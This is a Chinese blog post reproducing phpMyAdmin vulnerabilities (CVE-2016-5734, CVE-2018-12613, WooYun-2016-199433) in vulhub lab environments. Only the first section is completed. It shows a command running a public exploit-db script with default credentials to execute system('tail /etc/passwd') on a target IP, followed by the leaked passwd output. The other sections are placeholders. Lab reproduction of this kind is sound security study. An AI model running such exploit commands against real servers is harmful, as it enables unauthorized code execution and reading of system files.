phpmyadmin漏洞复现

2021-10-22 00:13:02

简介

漏洞环境:不另作说明均为vulhub。

在网上发现一篇文章,比我的强太多太多:https://www.cnblogs.com/liliyuanshangcao/p/13815242.html#_label2_5

参考链接:

官网:https://www.phpmyadmin.net/

百科:https://baike.baidu.com/item/PhpMyAdmin/9624049?fr=aladdin

phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HTML页面,也就是于远端管理MySQL数据库,方便的建立、修改、删除数据库及资料表。也可借由phpMyAdmin建立常用的php语法,方便编写网页时所需要的sql语法正确性。

phpmyadmin相信大家都比较熟悉,因为它集成在PHP study工具中,安全人员为了实验或是搭靶场,该工具一般都使用过。

CVE-2016-5734(phpMyAdmin认证用户远程代码执行漏洞)

参考链接:

https://zgao.top/从cve-2016-5734分析由preg_replace引发的rce/

exp:https://www.exploit-db.com/download/40185

在PHP5.4.7以前,preg_replace的第一个参数可以利用\0进行截断,并将正则模式修改为e。众所周知,e模式的正则支持执行代码,此时将可构造一个任意代码执行漏洞。

漏洞影响版本:

  • 4.0.10.16之前4.0.x版本
  • 4.4.15.7之前4.4.x版本
  • 4.6.3之前4.6.x版本

漏洞复现

emm,这个网上已经有现成的exp了,但是是有利用条件的,除了符合版本要求外,还需要知道phpmyadmin用户名和密码,并指定数据库。

┌──(kali㉿kali)-[~/Desktop]
└─$ python3 40185 -u root -p root -d test http://139.198.172.202:8080 -c 'system("tail /etc/passwd")'

/home/kali/Desktop/40185:60: SyntaxWarning: "is" with a literal. Did you mean "=="?
  if resp.status_code is 200:
result: data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false

emm,知道phpmyadmin的用户名及密码的话,可操作性还是有的。

漏洞修复

  • 升级phpmyadmin的版本。

CVE-2018-12613(本地文件包含造成远程代码执行漏洞复现)

参考链接:

https://blog.csdn.net/qq_34444097/article/details/85264686

漏洞影响版本:

  • Phpmyadmin Phpmyadmin 4.8.0
  • Phpmyadmin Phpmyadmin 4.8.0.1
  • Phpmyadmin Phpmyadmin 4.8.1

漏洞复现

emm,这个漏洞的利用条件跟CVE-2016-5734有点像,都需要有phpmyadmin的账户和密码,先空。

漏洞修复

WooYun-2016-199433

参考链接:

https://blog.csdn.net/qq_41832837/article/details/110277824

phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。

漏洞影响版本:

  • phpmyadmin 2.x

漏洞复现

环境启动不了

上一篇:docker.service lacks both ExecStart= and ExecStop= setting. Refusing. 或者是docker.service not found 问题


下一篇:systemd 的定时任务